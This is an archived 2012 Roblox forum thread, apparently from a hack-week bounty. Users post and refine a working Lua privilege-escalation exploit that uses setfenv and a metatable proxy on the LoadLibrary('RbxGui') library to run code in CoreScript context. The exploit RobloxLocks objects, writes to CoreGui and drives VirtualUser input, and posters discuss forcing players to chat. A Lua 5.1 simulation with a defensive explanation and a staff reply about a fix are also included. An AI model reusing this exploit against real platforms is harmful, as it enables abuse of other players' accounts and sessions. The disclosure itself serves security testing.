Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:12 PM
I remembered how much fun metatables are. This script is able to steal level 4 context simply by being inserted into players via starterpack/startergui/loadinggui. Notably, it hooks into "CoreGui.RobloxGui.CurrentLoadout.CoreScripts/BackpackScripts/LoadoutScript" via "Script "RbxGui", Line 1611 - upvalue moveDragger"
-----------------------------------
-- Hook: runs with the security context of whoever called the hooked library function.
hook = function()
    printidentity()
    print(pcall(function()
        local t = Instance.new("Part", workspace)
        t.Anchored = true
        t.Name = "EQ"
        t.RobloxLocked = true -- needs an elevated identity; only succeeds when a CoreScript triggered the hook
    end))
end

-- Proxy environment: any function looked up through it is replaced by hook; other globals pass through.
local p = setmetatable({}, {__index = function(t, i)
    printidentity()
    print(i)
    if getfenv(0)[i] then
        if type(getfenv(0)[i]) == "function" and getfenv(0)[i] ~= hook then
            return hook
        end
        return getfenv(0)[i]
    else
        print("Nope")
    end
end})

print("--" .. math.random() .. "--")
local l = assert(LoadLibrary("RbxGui"))

-- Retarget the environment of every function living in the library's own environment...
for name, v in next, getfenv(l.CreateLoadingFrame) do
    if type(v) == "function" then
        setfenv(v, p)
    end
end

-- ...and of the exported functions that the CoreScripts call.
local hr = {"CreateDropDownMenu", "CreateMessageDialog", "CreatePropertyDropDownMenu", "GetFontHeight", "CreateScrollingFrame", "AutoTruncateTextObject", "CreateLoadingFrame"}
for _, name in next, hr do
    setfenv(l[name], p)
end
-----------------------------------
Note that doing print(workspace.EQ.RobloxLocked) after it is hooked returns true, so it does in fact work. I can has hat?
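The mechanism the script above relies on (and the "context-is-defined-by-the-function-invoker" remark later in the thread), reduced to plain Lua 5.1 as an added illustration; this is not code from the thread or from Roblox. setfenv/getfenv exist only in Lua 5.1 and LuaJIT. The Roblox security identity is simulated by a variable `identity` that a stand-in "core script" raises for the duration of its call, and `RbxGui`, `setRobloxLocked` and `hook` are stand-in names chosen for the example; the real engine tied the context to the invoking thread, which is exactly what the hooked `__index` abuses.

```lua
-- Lua 5.1 only (setfenv/getfenv were removed in 5.2).
-- SIMULATION: `identity` stands in for the Roblox security context, which the
-- old engine derived from the invoking thread rather than from the function's origin.

local identity = 2                       -- the attacker's script runs here (untrusted)

-- Privileged operation: consults the *current* context, as the engine did.
local function setRobloxLocked(obj, value)
  if identity < 4 then
    error("setting RobloxLocked requires identity 4 (have " .. identity .. ")")
  end
  obj.RobloxLocked = value
end

-- Stand-in for the shared library returned by LoadLibrary("RbxGui").  Its
-- functions are ordinary Lua functions, so their globals (`print` here) are
-- resolved through their environment on every call.
local RbxGui = {}
function RbxGui.CreateLoadingFrame(name)
  print("CreateLoadingFrame: " .. name)  -- global lookup; goes through the env's __index
  return { Name = name }
end

-- Stand-in for a CoreScript: raises the context, calls the library, lowers it.
local function coreScriptCall()
  local saved = identity
  identity = 4
  local frame = RbxGui.CreateLoadingFrame("loading")
  identity = saved
  return frame
end

-- Attacker side, at identity 2.  Direct use of the privileged API fails:
local part = { Name = "EQ" }
assert(not pcall(setRobloxLocked, part, true))

-- The hook runs inside whatever context is active when the library function
-- resolves a global, i.e. inside the core script's call.
local function hook(...)
  setRobloxLocked(part, true)            -- succeeds only when invoked under identity 4
  return ...                             -- behave like a harmless `print`
end

-- Proxy environment: every function looked up through it is swapped for hook;
-- everything else falls through to the real globals.
local realEnv = getfenv(0)
local proxy = setmetatable({}, {
  __index = function(_, key)
    local v = realEnv[key]
    if type(v) == "function" and v ~= hook then return hook end
    return v
  end,
})

-- The one line the exploit hinges on: retarget the shared function's environment.
setfenv(RbxGui.CreateLoadingFrame, proxy)

-- Later the core script calls the library as it always does...
coreScriptCall()

-- ...and the attacker's object was modified by the privileged API.
assert(part.RobloxLocked == true)
assert(identity == 2)                    -- context is back to normal; the damage is done
print("RobloxLocked set from identity-2 code via the hooked library call")
```

Run it with `lua5.1 hook.lua`. The defensive point: a privilege check that asks "who is currently calling?" is satisfied by any code that manages to execute inside the privileged call, and `setfenv` on a shared Lua function is one way to get there; either the library functions must not be writable across the trust boundary or the check must be tied to the code's own origin rather than its caller.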
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:14 PM
Does this mean we can once again do all the crazy h4x we did when the bytecode exploit came out? :D
--- We're all immortal. We're just stuck in full screen. - Corecii
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:14 PM
>not level 6
it does have access to game.Players:Chat and robloxlocking, so you could potentially make players chat bad words regardless of if they want to or not =P
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:19 PM
Oh, and since level 4 has access to VirtualUser, I basically accomplished #3 too. game:service("VirtualUser"):Button1Down(Vector3.new(1,1))
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:24 PM
Let's see here...
hook = function()
    printidentity() -- level 4, close enough I hope.
    print(pcall(function()
        local t = Instance.new("Part", workspace)
        t.Anchored = true
        t.Name = "EQ"
        t.RobloxLocked = true
        -- CoreGui is only writable from an elevated context
        Gui = Instance.new("GuiMain")
        Gui.Name = "Que"
        Gui.Parent = game:service("CoreGui")
        Central = Instance.new("Frame")
        Central.Name = "Frame"
        Central.Parent = Gui
        Central.Position = UDim2.new(0, 0, 0, 0)
        Central.Size = UDim2.new(1, 0, 1, 0)
        Central.BackgroundColor3 = Color3.new(100, 100, 100)
        Central.BackgroundTransparency = 0.5
        Central.BorderColor3 = BrickColor:Black().Color
        Central.BorderSizePixel = 1
        Central.SizeConstraint = Enum.SizeConstraint.RelativeXY
        Central.ZIndex = 9
        Central.RobloxLocked = true -- Check #1
        game:service("VirtualUser"):Button1Down(Vector2.new(1, 1)) -- Check #3
    end))
end

-- Same proxy environment as in the first post: function lookups are answered with hook.
local p = setmetatable({}, {__index = function(t, i)
    printidentity()
    print(i)
    if getfenv(0)[i] then
        if type(getfenv(0)[i]) == "function" and getfenv(0)[i] ~= hook then
            return hook
        end
        return getfenv(0)[i]
    else
        print("Nope")
    end
end})

print("--" .. math.random() .. "--")
local l = assert(LoadLibrary("RbxGui"))

for name, v in next, getfenv(l.CreateLoadingFrame) do
    if type(v) == "function" then
        setfenv(v, p)
    end
end

local hr = {"CreateDropDownMenu", "CreateMessageDialog", "CreatePropertyDropDownMenu", "GetFontHeight", "CreateScrollingFrame", "AutoTruncateTextObject", "CreateLoadingFrame"}
for _, name in next, hr do
    setfenv(l[name], p)
end

Zewl (Joined: 29 Nov 2008, Total Posts: 446)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:28 PM
..And this proves to me that I need to get back into LUA.

DannyCore (Joined: 25 Apr 2012, Total Posts: 887)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:29 PM
pretty much you owned us by 250 dollars

1waffle1 (Joined: 16 Oct 2007, Total Posts: 12741)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:29 PM
@zewl start out by learning what it's called.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:29 PM
Step 1: Relearn name.
--- The problem with making computers complete idiots can use is you have complete idiots using computers.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:31 PM
Note: If level 4 isn't high enough, I could re-insert a StarterScript (level 5), which would then re-trigger the hook since it is authenticated for CoreScripts' assetid.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:32 PM
Link to my place to prove the CoreGui works, which I am doing via the level 4 hook above. http://www.roblox.com/Hack-week-submission-place?id=33053738
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:41 PM
I just tried it and it acted as if I was using a regular LocalScript, giving errors and whatnot about me accessing the CoreGui and VirtualUser. Btw, you need level 7 for the money. I'm fairly certain that level 7 isn't even usable and they said that just to get people like you to post "close enough?" and give them a free hack.

Zewl (Joined: 29 Nov 2008, Total Posts: 446)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:41 PM
@Waffle
I used to frequent ROBLOX a lot - I'm fully capable of using LUA as well as PHP, JS, HTML, CSS, Batch, UNIX and some Java. I was commenting on how I want to start using LUA again. I am fully competent.
Please, do try and be less condescending in the future.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:41 PM
Ladies and gentlemen, I now present to you: The winner of life. RenderSettings, +1 respect. Excellent work.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:43 PM
"I used to frequent ROBLOX a lot - I'm fully capable of using LUA as well as PHP, JS, HTML, CSS, Batch, UNIX and some Java. I was commenting on how I want to start using LUA again. I am fully competent."
You're evidently not competent enough to understand that "Lua" (the programming language) is not an acronym.
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:43 PM
@Zewl And yet this entire time you spell it "LUA". It is not an acronym and should not be used like one; it is spelled "Lua".

jode6543 (Joined: 16 Jun 2009, Total Posts: 4835)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:43 PM
Dangit, stop being smart. I wanted that. D: .. Not that I ever expected to get it. I'm good at the use-it-for-something-it-wasn't-meant-for hacks, not bypass-security hacks.
[[There is no place like ~]]
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:44 PM
Arceus: Since the hack depends on your HTTP GET for the linked source being slow enough that it can inject into LoadLibrary first, it might not work if you have a super fast connection. Did you visit my place, or put it in StarterGui/StarterKit/loadinggui?
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:49 PM
"Arceus: Since the hack depends on your HTTP GET for the linked source being slow enough that it can inject into LoadLibrary first, it might not work if you have a super fast connection. Did you visit my place, or put it in StarterGui/StarterKit/loadinggui?"
I was running a local server. Thanks.

Zewl (Joined: 29 Nov 2008, Total Posts: 446)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:49 PM
@Dr and Absolute
It's 00:45 as I'm writing this. I haven't used Lua in a while, and I forgot that it wasn't an acronym unlike so many other languages. Please don't eat me; I'm tired, I made a mistake.

Zewl (Joined: 29 Nov 2008, Total Posts: 446)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 06:55 PM
Shall I just go and hide in the web developer corner?
Yeah, I think I might do that.

Sorcus (Joined: 29 Nov 2010, Total Posts: 3454)
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 07:19 PM
@RenderSettings, Ha, I expected this :) So - we have done something special to stop this. No more patching after it happens. Will give details after it's ready :)
~Sorcus
Re: Sorcus: More on LoadLibrary Posted: 13 Dec 2012 07:25 PM
So no more context-is-defined-by-the-function-invoker? That's good. Still, not sure how you will separate the security levels! Good luck!
*psst. i can has moony/hat*